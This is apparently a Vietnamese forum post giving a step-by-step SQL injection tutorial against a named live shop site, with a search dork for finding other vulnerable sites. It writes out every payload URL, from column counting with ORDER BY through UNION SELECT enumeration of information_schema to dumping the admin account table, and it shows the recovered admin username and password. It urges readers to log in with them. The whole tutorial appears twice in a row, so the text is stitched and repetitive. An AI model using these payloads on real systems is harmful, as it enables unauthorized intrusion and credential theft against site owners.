Bài liên quan
Đầu Tiên ! Xin Chào Mng ^_^ mình mới tham gia forum nên có gì ko đúng các pro chỉ thêm ^^!
Tiếp theo ... Cần Chuẩn Bị :
1.Hackbar (Vào https://addons.mozilla.org/vi/firefox -> search " Hackbar " )
2. 1 cái đầu và những ngón tay =]]z~
Bây Giờ Tiến Hành Với Victim Nhé !
Victim : http://pscells.com ( Hoặc Có Thế Lên Google Gõ "inurl:index.php?id=" Để Dork tìm Site Bị Lỗi SQL )
Đi 1 Vòng Site Tìm Link Có Dạng ?id=
Chẳng hạn như link này : http://pscells.com/chitietsanpham.php?id=40
Tiếp Theo Kiểm Tra Lỗi Bằng Cách Thêm Dấu ' Vào Và Ta Đc Link Như Thế Này :
http://pscells.com/chitietsanpham.php?id=40'
Nếu Site Có Lỗi Thì Nó Sẽ Hiện Như Thế này :
Sau Đó Dùng Lệnh Order By Để Tìm Số Cột (Column)
http://pscells.com/chitietsanpham.php?id=40 order by 5-- - ==> Ko Lỗi
http://pscells.com/chitietsanpham.php?id=40 order by 10-- - ==> Lỗi
Vậy : 5 < x < 10
Tìm Tiếp :
http://pscells.com/chitietsanpham.php?id=40 order by 7-- - ==> Ko Lỗi
Vậy : 7 < x < 10
Tiếp Nào :
http://pscells.com/chitietsanpham.php?id=40 order by 9-- - ==> Lỗi
Vậy : 7 < x < 9 ===> Thế Số Cột (Column) Là 8 Nhé
Bây h Dùng Lệnh UNION SELECT để khai thác nó
Vậy ta sẽ dùng lệnh UNION SELECT với số cột là 8
Ta Sẽ Có Link :
http://pscells.com/chitietsanpham.php?id=40 UNION SELECT 1,2,3,4,5,6,7,8-- -
Trường Hợp Vài Site Khi Khai Thác Lệnh Này Xoq Vẫn Ko Thấy Gì ==> Cách Giải Quyết :
Thay Null Vào ?id=40 Có Nghĩa Là Link Sẽ Thành :
http://pscells.com/chitietsanpham.php?id=null UNION SELECT 1,2,3,4,5,6,7,8-- -
Nếu Cột Nào Đó Từ 1 -> 8 Bị Lỗi Sẽ Xuất Hiện Như Hình :
Vậy Cột 6 Bị Lỗi Nhé
Bây giờ ta khai thác với lệnh như sau:
http://pscells.com/chitietsanpham.php?id=null UNION SELECT 1,2,3,4,5,group_concat(table_name),7,8 from information_schema.tables where table_schema=database()-- -
( Thay Thế Group_concat(table_name) vào số cột bị lỗi mà ta đã tìm hồi nãy ( cột 6 ) , Thêm from information_schema.tables where table_schema=database() Để Tìm Ra Cách Table Có Trong Database )
Và Sau Đó Ta Đc Các Table Của Database Như Hình :
Lưu Ý Chúng Ta Cần Tìm ID và Pass Của Admin , Nên Ta Sẽ Chọn Table Có Liên Quan Đến Tài Khoản Người Dùng . Như Troq Hình Là Table " Taikhoan "
Tiếp Theo Tìm Các Column Trong Table taikhoan . Cần Phãi Encode tên table sang mã Hex Và thêm trước nó "0x" Để Hệ Thống Biết Đó Là Mã Hex . Mã Hex cũa taikhoan là 7461696b686f616e Thêm "0x" ỡ đầu sẽ thành :
0x7461696b686f616e <== Thay Mã Hex này Với Database() như Hình :
Và Sửa Link ỡ 1 vài chỗ :
http://pscells.com/chitietsanpham.php?id=null UNION SELECT 1,2,3,4,5,group_concat(table_name),7,8 from information_schema.tables where table_schema=database()-- -
Thành
http://pscells.com/chitietsanpham.php?id=null UNION SELECT 1,2,3,4,5,group_concat(column_name),7,8 from information_schema.columns where table_name=0x7461696b686f616e-- -
Ta sẽ được:
Tiếp theo lấy giá trị từ các column này ra ( Ko Cần Dùng Mã Hex Cho Các Tên Column Này )
Đổi link ỡ 1 số chỗ :
http://pscells.com/chitietsanpham.php?id=null UNION SELECT 1,2,3,4,5,group_concat(id,0x207c20,name,0x207c20,pass,0x207c20),7,8 from taikhoan-- -
Lưu ý: Mã Hex 0x207c20 Là Mã Hex Của " | " Mình Đễ Vậy Để Phân Cách Các Giá Trị Sau Khi Get Cho Dễ Nhìn ^^! Ko Cần Thiết Lắm
Xóa Hết Phần Sau Chừa Lại from Và Thêm Tên Table Mà Hồi Nãy Mình Khai Thác Như : taikhoan
Và Ta Sẽ Đc Như Hình :
Như hình trên. Ta được 1 ID Admin Là :
ID: Admin
Pass : @#123@#
Số 1 Là Số User troq site ^^
Thế là xong ! Tìm link admin và đăng nhập vào thôi ^_^ ^_^!!
Thế Là Xoq Rồi Nhé ^^!
Tiếp theo ... Cần Chuẩn Bị :
1.Hackbar (Vào https://addons.mozilla.org/vi/firefox -> search " Hackbar " )
2. 1 cái đầu và những ngón tay =]]z~
Bây Giờ Tiến Hành Với Victim Nhé !
Victim : http://pscells.com ( Hoặc Có Thế Lên Google Gõ "inurl:index.php?id=" Để Dork tìm Site Bị Lỗi SQL )
Đi 1 Vòng Site Tìm Link Có Dạng ?id=
Chẳng hạn như link này : http://pscells.com/chitietsanpham.php?id=40
Tiếp Theo Kiểm Tra Lỗi Bằng Cách Thêm Dấu ' Vào Và Ta Đc Link Như Thế Này :
http://pscells.com/chitietsanpham.php?id=40'
Nếu Site Có Lỗi Thì Nó Sẽ Hiện Như Thế này :
Sau Đó Dùng Lệnh Order By Để Tìm Số Cột (Column)
http://pscells.com/chitietsanpham.php?id=40 order by 5-- - ==> Ko Lỗi
http://pscells.com/chitietsanpham.php?id=40 order by 10-- - ==> Lỗi
Vậy : 5 < x < 10
Tìm Tiếp :
http://pscells.com/chitietsanpham.php?id=40 order by 7-- - ==> Ko Lỗi
Vậy : 7 < x < 10
Tiếp Nào :
http://pscells.com/chitietsanpham.php?id=40 order by 9-- - ==> Lỗi
Vậy : 7 < x < 9 ===> Thế Số Cột (Column) Là 8 Nhé
Bây h Dùng Lệnh UNION SELECT để khai thác nó
Vậy ta sẽ dùng lệnh UNION SELECT với số cột là 8
Ta Sẽ Có Link :
http://pscells.com/chitietsanpham.php?id=40 UNION SELECT 1,2,3,4,5,6,7,8-- -
Trường Hợp Vài Site Khi Khai Thác Lệnh Này Xoq Vẫn Ko Thấy Gì ==> Cách Giải Quyết :
Thay Null Vào ?id=40 Có Nghĩa Là Link Sẽ Thành :
http://pscells.com/chitietsanpham.php?id=null UNION SELECT 1,2,3,4,5,6,7,8-- -
Nếu Cột Nào Đó Từ 1 -> 8 Bị Lỗi Sẽ Xuất Hiện Như Hình :
Vậy Cột 6 Bị Lỗi Nhé
Bây giờ ta khai thác với lệnh như sau:
http://pscells.com/chitietsanpham.php?id=null UNION SELECT 1,2,3,4,5,group_concat(table_name),7,8 from information_schema.tables where table_schema=database()-- -
( Thay Thế Group_concat(table_name) vào số cột bị lỗi mà ta đã tìm hồi nãy ( cột 6 ) , Thêm from information_schema.tables where table_schema=database() Để Tìm Ra Cách Table Có Trong Database )
Và Sau Đó Ta Đc Các Table Của Database Như Hình :
Lưu Ý Chúng Ta Cần Tìm ID và Pass Của Admin , Nên Ta Sẽ Chọn Table Có Liên Quan Đến Tài Khoản Người Dùng . Như Troq Hình Là Table " Taikhoan "
Tiếp Theo Tìm Các Column Trong Table taikhoan . Cần Phãi Encode tên table sang mã Hex Và thêm trước nó "0x" Để Hệ Thống Biết Đó Là Mã Hex . Mã Hex cũa taikhoan là 7461696b686f616e Thêm "0x" ỡ đầu sẽ thành :
0x7461696b686f616e <== Thay Mã Hex này Với Database() như Hình :
Và Sửa Link ỡ 1 vài chỗ :
http://pscells.com/chitietsanpham.php?id=null UNION SELECT 1,2,3,4,5,group_concat(table_name),7,8 from information_schema.tables where table_schema=database()-- -
Thành
http://pscells.com/chitietsanpham.php?id=null UNION SELECT 1,2,3,4,5,group_concat(column_name),7,8 from information_schema.columns where table_name=0x7461696b686f616e-- -
Ta sẽ được:
Tiếp theo lấy giá trị từ các column này ra ( Ko Cần Dùng Mã Hex Cho Các Tên Column Này )
Đổi link ỡ 1 số chỗ :
http://pscells.com/chitietsanpham.php?id=null UNION SELECT 1,2,3,4,5,group_concat(id,0x207c20,name,0x207c20,pass,0x207c20),7,8 from taikhoan-- -
Lưu ý: Mã Hex 0x207c20 Là Mã Hex Của " | " Mình Đễ Vậy Để Phân Cách Các Giá Trị Sau Khi Get Cho Dễ Nhìn ^^! Ko Cần Thiết Lắm
Xóa Hết Phần Sau Chừa Lại from Và Thêm Tên Table Mà Hồi Nãy Mình Khai Thác Như : taikhoan
Và Ta Sẽ Đc Như Hình :
Như hình trên. Ta được 1 ID Admin Là :
ID: Admin
Pass : @#123@#
Số 1 Là Số User troq site ^^
Thế là xong ! Tìm link admin và đăng nhập vào thôi ^_^ ^_^!!
Thế Là Xoq Rồi Nhé ^^!
Nguồn St
Post a Comment